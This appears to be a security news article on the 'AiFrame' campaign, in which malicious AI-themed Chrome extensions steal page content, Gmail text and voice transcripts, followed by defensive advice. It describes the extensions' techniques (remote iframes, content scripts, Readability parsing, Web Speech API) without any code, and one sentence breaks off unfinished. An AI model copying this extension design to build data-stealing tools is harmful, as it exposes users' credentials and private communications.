Growing interest in AI-powered assistants and “smart” browser tools is being actively abused by cybercriminals. Researchers at LayerX have disclosed a large-scale campaign, dubbed AiFrame, that leverages malicious AI Chrome extensions to steal sensitive data. At least 30 extensions in the official Chrome Web Store were linked to this operation, collectively installed by more than 300,000 users, with some remaining available even after the campaign was reported.
AiFrame campaign: centralized malicious infrastructure behind AI-themed extensions
All identified extensions in the AiFrame campaign communicate with a shared command-and-control infrastructure tied to the domain tapnetic[.]pro. This common backend is a strong indicator that these add-ons are not independent products but different “skins” for the same malicious platform designed for data exfiltration and remote control.
The most widely installed extension was Gemini AI Sidebar, which alone accumulated over 80,000 installs. According to LayerX and reports from BleepingComputer, Google has removed this particular extension, although other AiFrame-related plugins with thousands of installations each remained temporarily accessible in the Chrome Web Store.
Unified logic and remote control enable stealthy changes
The 30 malicious AI Chrome extensions share a nearly identical internal architecture, including JavaScript logic and requested permissions. Instead of implementing local AI capabilities or using legitimate APIs, they render a full-screen iframe that loads content from the remote AiFrame infrastructure.
This design allows threat actors to change extension behavior server-side without pushing an update through the Chrome Web Store. As a result, malicious features can be activated or modified dynamically, bypassing extension reviews, evading traditional detection, and making it difficult for users and security teams to notice when a once-benign tool becomes dangerous.
How malicious AI Chrome extensions steal data and credentials
Harvesting page content with Mozilla Readability
Once installed, AiFrame extensions monitor user activity and systematically extract the content of visited web pages, including login forms, dashboards, and private workspaces. To parse and normalize page structure, the attackers abuse the Mozilla Readability library, originally designed to simplify web pages for “reader mode.”
By running Readability in the background, the extensions can reliably identify and capture usernames, passwords, session tokens, personal data, messages, and other sensitive information. This data is then transmitted to remote servers controlled by the AiFrame operators, enabling credential theft, account takeover, and further lateral movement across services where the same accounts or passwords are reused.
Targeted Gmail data theft via content scripts
A particularly concerning element of the AiFrame campaign is its focus on Gmail data theft. At least 15 of the 30 malicious Chrome extensions contain a dedicated content script for mail.google.com. Content scripts are pieces of code that run within the context of a web page and can read or modify its Document Object Model (DOM).
In this case, the content script reads the visible text of emails directly from the DOM, continuously extracting message content via the .textContent property. This allows the malware to capture not only incoming and outgoing emails but also draft messages that the user has typed but not yet saved or sent.
When users trigger Gmail’s built-in AI features—such as automatic reply suggestions or email summarization—the extension intercepts the text and associated context before it is processed. This information is then forwarded to AiFrame’s internal logic and remote servers, effectively moving the entire email conversation outside Gmail’s native security and privacy controls.
Abuse of Web Speech API for covert voice interception
Beyond text, AiFrame’s malicious AI Chrome extensions can also misuse the Web Speech API to capture voice data. By remotely triggering speech recognition in the browser, attackers can record transcripts of voice input and exfiltrate them as plain text.
Depending on the permissions granted by the user, this could extend from capturing dictated emails and voice queries to potentially recording fragments of ambient conversations near the device. While exact impact depends on user behavior and browser permissions, this vector significantly expands the scope of possible privacy violations.
Security impact and protection against malicious AI Chrome extensions
Installing one of these AI-themed extensions effectively grants it long-term, low-visibility access to a user’s digital life. The consequences range from credential theft and compromise of personal accounts to exposure of corporate emails, intellectual property, and confidential business negotiations. Historically, malicious browser extensions have been used to support business email compromise (BEC)
Recommended actions for users and organizations
Users who suspect they may have installed AiFrame-related or similar malicious Chrome extensions should take immediate steps to reduce risk:
1. Remove suspicious extensions from Chrome, especially those offering free AI capabilities without clear provenance or a transparent privacy policy.
2. Change passwords for all high-value accounts (email, banking, corporate services) and enable multi-factor authentication (MFA) wherever possible.
3. Review active sessions and devices in Google accounts, email services, and corporate identity platforms, terminating any unknown or outdated sessions.
4. Audit extension permissions regularly and uninstall any add-ons that request broad access such as “Read and change all your data on all websites” without a strong, justified business need.
5. For organizations, implement an extension allowlist policy, browser management via enterprise tools, and user awareness training specifically addressing risks of “free AI” browser plugins.
As the AiFrame campaign demonstrates, even the official Chrome Web Store cannot be treated as a guaranteed safe environment. Sustainable protection requires a combination of technical controls, cautious installation practices, regular reviews of installed extensions, strong password hygiene, and consistent use of multi-factor authentication. Treat any “AI assistant” extension—especially those promising powerful features at no cost and with extensive permissions—as a potential entry point for data theft, and verify its developer, reputation, and privacy posture before granting it access to your browser and your most sensitive information.